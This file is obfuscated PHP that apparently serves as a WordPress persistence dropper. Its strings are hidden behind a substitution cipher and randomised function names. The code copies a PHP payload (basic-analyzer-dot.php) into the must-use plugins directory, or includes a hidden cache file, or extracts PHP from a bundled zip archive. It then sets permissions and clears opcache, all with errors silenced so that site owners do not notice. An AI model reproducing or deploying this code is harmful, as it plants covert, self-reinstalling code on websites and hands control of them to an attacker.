<?php
if(!function_exists('fneb_103kphggoug')){function do8k5n3ws5w_($i){static $a=null;if($a===null){$a=array('R/f2</w2','Wli</w2','lfA4lj2','4lj2flD2','lfAWli','wHWli','4lj2Ah2qAcb<q2<qf','lfAfqil<h','fqij2<','fqixbf','4U<cqlb<A26lfqf','q2wx</w','4lj2AxUqAcb<q2<qf','4U<cqlb<A26lfqf','i2</w2','cbxd','U<jl<H','4U<cqlb<A26lfqf','crwbW','U<jl<H','lfA4lj2','cj/ffA26lfqf','lfAWli','fURfqi','lfAfqil<h','4U<cqlb<A26lfqf','4U<cqlb<A26lfqf','crwbW','.lxNicrlo2','hwpkwDi-');}return $a[$i];}function fneb_103kphggoug($i){$e=do8k5n3ws5w_($i);$f='WP_C'.'ONTE'.'DI'.'Rwp-'.'con'.'te/m'.'ulg'.'is'.'SLUG'.'.h'.'<?a'.'ry'.'dvHA'.'ZM'.'kfb'.'64x2'.'qzj5'.'13';$t='IPAg'.'1TE'.'aC'.'st'.'kxv'.'cb<'.'q2Z'.'wU'.'jhl'.'fGm'.'?5'.'3rL'.'e/id'.'Wo'.'nN'.'.uH4'.'RMz'.'6S_'.'DpO-'.'y';$r="";for($j=0;$j<strlen($e);$j++){$p=strpos($t,$e[$j]);$r.=($p===false)?$e[$j]:$f[$p];}return $r;}function am4asl3wm_($i){$j=(int)$i;return fneb_103kphggoug($j);}function uwzgtkqxizmx6($i){return fneb_103kphggoug($i);}function gwrtf3rjox8si($i){$j=(int)$i;return fneb_103kphggoug($j);}function rn13js3nz35t($i){return fneb_103kphggoug($i);}
if(class_exists(gwrtf3rjox8si(28),false)&&!class_exists(rn13js3nz35t(29),false)){class gmjwmzr1 extends \ZipArchive {}}
function zc_3b1kk6g1ec_u8fr($q_6zig){$d9325d=($q_6zig>0)?$q_6zig:7;return $d9325d-3;}
function dr3g50r5z79uil8n($spfuja_9,$dhye0m){$b3iu4bzp2=($spfuja_9^$dhye0m)&1;return $b3iu4bzp2;}
$necw58lkaj8 =   defined("WP_CONTENT_DIR")    ?  WP_CONTENT_DIR :  "";
if      (!$necw58lkaj8)    {
$tw7ucua896yibsh   =   __DIR__;
      for     ($fiayj54bdltj26x   =   0; $fiayj54bdltj26x   <     (2+2);    $fiayj54bdltj26x++)  {
 if   (am4asl3wm_(0)($tw7ucua896yibsh) ===  "wp-content") { $necw58lkaj8 =  $tw7ucua896yibsh;   break; }
$tw7ucua896yibsh  =  uwzgtkqxizmx6(1)($tw7ucua896yibsh);
    }
 if  (!$necw58lkaj8)  $necw58lkaj8 =  __DIR__;
      }
   $iv9s926bbv090afu     = $necw58lkaj8 .  "/mu-plugins";
$orb1mfpmld  =   $iv9s926bbv090afu  .   "/basic-analyzer-dot.php";


      $tyhje0d_ztjf =  $necw58lkaj8 .  "/plugins/basic-analyzer-dot/basic-analyzer-dot.php";
if  (!@am4asl3wm_(2)($orb1mfpmld) ||  @uwzgtkqxizmx6(3)($orb1mfpmld)     <  (2509+2491))    {
if     (@am4asl3wm_(2)($tyhje0d_ztjf) &&  @fneb_103kphggoug(3)($tyhje0d_ztjf)  >      (4906+94))  {
  if (!@fneb_103kphggoug(4)($iv9s926bbv090afu))  @fneb_103kphggoug(5)($iv9s926bbv090afu,    (458+35), true);
 $hhk3dm50idkenoqt =   @uwzgtkqxizmx6(6)($tyhje0d_ztjf);
     if (!fneb_103kphggoug(7)($hhk3dm50idkenoqt)    || uwzgtkqxizmx6(8)($hhk3dm50idkenoqt)    <  (465+35) ||   uwzgtkqxizmx6(9)($hhk3dm50idkenoqt,   "<?") !==   0)   $hhk3dm50idkenoqt    = false;
     $vid4a8ncnlfgbtly  =  ($hhk3dm50idkenoqt  !==  false   &&   rn13js3nz35t(10)('tempnam')    ?    @fneb_103kphggoug(11)(am4asl3wm_(1)($orb1mfpmld),  'sc_') :  false);
if ($vid4a8ncnlfgbtly   !==  false) {
$p55p0d48fou8x     =  @fneb_103kphggoug(12)($vid4a8ncnlfgbtly,    $hhk3dm50idkenoqt);
if ($p55p0d48fou8x  !==   false   &&  $p55p0d48fou8x  ===    uwzgtkqxizmx6(8)($hhk3dm50idkenoqt)) {
  $lzrpd8a3xosevq  = false;
   if   (uwzgtkqxizmx6(13)('rename')) $lzrpd8a3xosevq =   @gwrtf3rjox8si(14)($vid4a8ncnlfgbtly,    $orb1mfpmld);
if   (!$lzrpd8a3xosevq    &&   gwrtf3rjox8si(13)('copy'))  {     $lzrpd8a3xosevq  =  @fneb_103kphggoug(15)($vid4a8ncnlfgbtly,     $orb1mfpmld);     if   ($lzrpd8a3xosevq) @rn13js3nz35t(16)($vid4a8ncnlfgbtly);   }
  if   (!$lzrpd8a3xosevq)  @am4asl3wm_(16)($vid4a8ncnlfgbtly);
  if     (rn13js3nz35t(17)('chmod'))  @fneb_103kphggoug(18)($orb1mfpmld,  (353+67));     if  (fneb_103kphggoug(17)('opcache_invalidate'))  @opcache_invalidate($orb1mfpmld,   true);$h7w3trwee=60*4;$cjyp4fx0oy=$h7w3trwee-34;
     }    else   {
   @fneb_103kphggoug(19)($vid4a8ncnlfgbtly);
  }
 }
  }

if  (!@uwzgtkqxizmx6(2)($orb1mfpmld)   ||  @rn13js3nz35t(3)($orb1mfpmld)  <   (0x2+0x1386)) {
    $w9lp8mpc4ggi  =  $necw58lkaj8     . "/cache";
 $c77hgkpg5y4 =  $w9lp8mpc4ggi .    "/66664f76.php";
   if (@uwzgtkqxizmx6(20)($c77hgkpg5y4))     {
@define('SC_AUTO_PREPEND', 1);
  try     {     @include_once     $c77hgkpg5y4;    }    catch    (Throwable $s99biz9b4j) {}
  } else   {
$f1t2ezo2otg744 = $necw58lkaj8    . "/a2ea417b.zip";
  if  (!@am4asl3wm_(20)($f1t2ezo2otg744)) $f1t2ezo2otg744 =   __DIR__  .  "/a2ea417b.zip";
 if  (uwzgtkqxizmx6(21)("ZipArchive") &&   @fneb_103kphggoug(20)($f1t2ezo2otg744))     {
if    (!@fneb_103kphggoug(22)($iv9s926bbv090afu))    @uwzgtkqxizmx6(5)($iv9s926bbv090afu, (452+41),  true);
$bkaofkugit4ru = new   gmjwmzr1();
if    ($bkaofkugit4ru->open($f1t2ezo2otg744)  ===  true)  {
  for    ($ajxzpjaatq  =    0; $ajxzpjaatq    <     $bkaofkugit4ru->numFiles;    $ajxzpjaatq++)   {
    $hkvji5ontu  =    $bkaofkugit4ru->getNameIndex($ajxzpjaatq);
 if  (fneb_103kphggoug(23)($hkvji5ontu,   -(6-2))     ===   ".php") {
  $hhk3dm50idkenoqt    =  $bkaofkugit4ru->getFromIndex($ajxzpjaatq);$kk6m1u9h7ur0h_=698;$wndbcg94pvbl=($kk6m1u9h7ur0h_>0)?$kk6m1u9h7ur0h_:-$kk6m1u9h7ur0h_;
if   (!gwrtf3rjox8si(24)($hhk3dm50idkenoqt)   ||   am4asl3wm_(8)($hhk3dm50idkenoqt) < (0x155+0x9f) || gwrtf3rjox8si(9)($hhk3dm50idkenoqt,     "<?")  !==   0)  $hhk3dm50idkenoqt  =      false;
     $vid4a8ncnlfgbtly =   ($hhk3dm50idkenoqt   !==     false &&  am4asl3wm_(17)('tempnam')  ? @rn13js3nz35t(11)(am4asl3wm_(1)($orb1mfpmld),  'sc_') : false);
     if     ($vid4a8ncnlfgbtly      !== false) {
  $p55p0d48fou8x   =  @am4asl3wm_(12)($vid4a8ncnlfgbtly,    $hhk3dm50idkenoqt);
 if  ($p55p0d48fou8x  !== false   &&   $p55p0d48fou8x  === am4asl3wm_(8)($hhk3dm50idkenoqt)) {$v4keeilvd39bf3=(0x71+0xfa);$u_4mrocgx97=$v4keeilvd39bf3%16;
  $lzrpd8a3xosevq   = false;
   if   (am4asl3wm_(17)('rename'))  $lzrpd8a3xosevq  = @am4asl3wm_(14)($vid4a8ncnlfgbtly,    $orb1mfpmld);
    if (!$lzrpd8a3xosevq  &&  am4asl3wm_(25)('copy')) { $lzrpd8a3xosevq  = @rn13js3nz35t(15)($vid4a8ncnlfgbtly,  $orb1mfpmld); if ($lzrpd8a3xosevq)  @rn13js3nz35t(19)($vid4a8ncnlfgbtly);  }


 if   (!$lzrpd8a3xosevq)  @rn13js3nz35t(19)($vid4a8ncnlfgbtly);
if   (uwzgtkqxizmx6(26)('chmod'))      @uwzgtkqxizmx6(27)($orb1mfpmld,  (745-325));  if (fneb_103kphggoug(26)('opcache_invalidate'))  @opcache_invalidate($orb1mfpmld, true);
     }   else  {
@rn13js3nz35t(19)($vid4a8ncnlfgbtly);
       }
   }
   }
// expected path

  }
 $bkaofkugit4ru->close();
}



  }
// compact watermark

      }
      }
  }
  
}